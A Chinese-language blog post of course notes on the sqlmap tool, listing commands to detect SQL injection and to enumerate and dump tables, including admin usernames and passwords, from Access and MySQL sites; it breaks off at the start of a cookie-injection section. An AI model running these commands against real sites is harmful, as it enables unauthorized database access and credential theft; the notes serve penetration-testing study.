羽翼sqlmap课程学习笔记

本文详细介绍了sqlmap工具的使用,包括检测SQL注入、Access和MySQL数据库注入、Cookie注入、POST登录注入、交互式命令执行、伪静态注入及处理请求延迟的方法,并提供了具体的命令示例。
摘要由CSDN通过智能技术生成
               sqlmap学习笔记
 sqlmap.py -u "URL" #判断是否存在注入
 
出现 “please enter number of threads?” 设置跑表的线程 对于Access数据库 本屌是建议大点 一般10差不多
对于cookie注入线程放小,要不然出现报错,一般为5,


终止注入:Ctrl+C
  
一: Access数据库注入
  sqlmap.py -u "URL" --tables #跑表
  sqlmap.py -u "URL" --columns -T admin #对admin表里的字段猜解
  sqlmap.py -u "URL" --dump -T admin -C "username,password" #列出admin表里面username,passwrod的内容


二:Mysql数据库注入 
  sqlmap.py -u "URL" --dbs #猜解数据库
  sqlmap.py -u "URL" -D mysl #mysl是猜解出来的数据库,-D 指定一个数据库 
  sqlmap.py -u "URL" -D mysl -T my_admin --columns #获取my_admin表里面的字段,
  sqlmap.py -u "URL" -D mysl -T my_admin -C id,user,password #获取id,user,password的内容


三:Cookie注入
  例如注入点为:www.xxx.com/new_asp.a
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值